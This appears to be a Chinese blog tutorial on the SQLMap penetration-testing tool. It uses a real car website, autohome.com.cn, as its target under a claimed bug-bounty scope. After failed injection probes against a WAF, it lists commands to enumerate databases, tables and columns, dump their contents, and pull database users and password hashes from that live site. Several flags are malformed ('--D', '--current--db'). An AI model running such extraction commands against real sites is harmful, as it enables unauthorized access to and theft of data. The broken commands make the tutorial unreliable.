断剑重铸004

常用的渗透测试工具

SQLMap

以汽车之家为例子,业务范围:*.autohome.com.cn *.che168.com,我是玩靶机的人吗?找SRC合法实战。。。
官网:https://www.autohome.com.cn
搜索一下奥迪Q5L:https://www.autohome.com.cn/4851
审查元素发现输入框被设置为隐藏属性,URL手动输入:https://www.autohome.com.cn/4851/?id=奥迪Q5L,显示出奥迪Q5L结果

既然参数找到了,就实战一下SQLMap

直接用kali里面的sqlmap

  • 更新sqlmap
cd /usr/share/
rm -rf sqlmap/
git clone https://github.com/sqlmapproject/sqlmap
  • 判断是否存在注入
sqlmap -u "https://www.autohome.com.cn/4851/?id=1"

反馈中提示有waf

  • 我们知道sqlmap自带的有测waf的,进入tamper看看
cd /usr/share/sqlmap/tamper
ls
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --tamper apostrophemask

从反馈的提示中发现,参数似乎不可注入,让我们尝试更多的选项

  • 再一次加入--time-sec=20,--level=3(1-5个级别,默认1)或者--risk(0-3,默认1)
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --tamper apostrophemask --time-sec=20 --level=3

反馈发现还是不行。出于教学目的,能把sqlmap用到这里已经超过大部分小白了。

  • 判断文本中的请求是否存在注入

抓HTTP请求包,把请求包保存都txt文本文件里面,配合sqlmap一起使用。
这里配合火狐浏览器的,web开发者工具箱,拿到HTTP请求包。保存到kali桌面中命名为test.txt

sqlmap -hh
cd 桌面
pwd test.txt
sqlmap -r /root/桌面/test.txt
  • 查询当前用户下的所有数据库
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --dbs
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名
  • 获取数据库中的表名
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 --tables
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 -T 表名
  • 获取表中的字段名
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 -T 表名 --columns
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 -T 表名 -C 字段名
  • 获取字段内容
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 -T 表名 -C 字段名 --dump
  • 获取数据库的所有用户,需要具备访问权
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --users
  • 获取数据库用户的密码
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --passwords
  • 获取当前网站数据库的名称
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --current--db
  • 获取当前网站数据库的用户名称
sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --current--user
  • 静与悟

静下心,让我们聊聊以上技术的本源问题。
我想,您应该发现了:在有资料和例子的情况下,通过搜索引擎您就可以完成以上所有部分。
剩下的,无非就是别人用过各种参数,您没有枚举式使用过。
没关系,您可以搜索SQLmap手册 参数等关键词,那里存在大量资料和例子。
但是,我还是有必要提醒您,因为网络上所有的信息都是为人写上去的,书中详解肯定不会copy到网上。
我的建议:已书籍,视频教学为主,互联网查询为辅。
我举个例子:书中说,如果您不确定哪个参数存在注入的话,尽可能的使用--level 3以上的级别。
您可以尽管的去网上搜,10个结果中有3个如此教学,那么这文章真的就是在教学,否则只能认为它是简要的笔记,用于查询。
哪怕就是最详细的教学文章,它的篇幅也是心有余而力不足。无法满足那些极度认真的人,成长。阅读吧,请。

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/sec875/p/11409987.html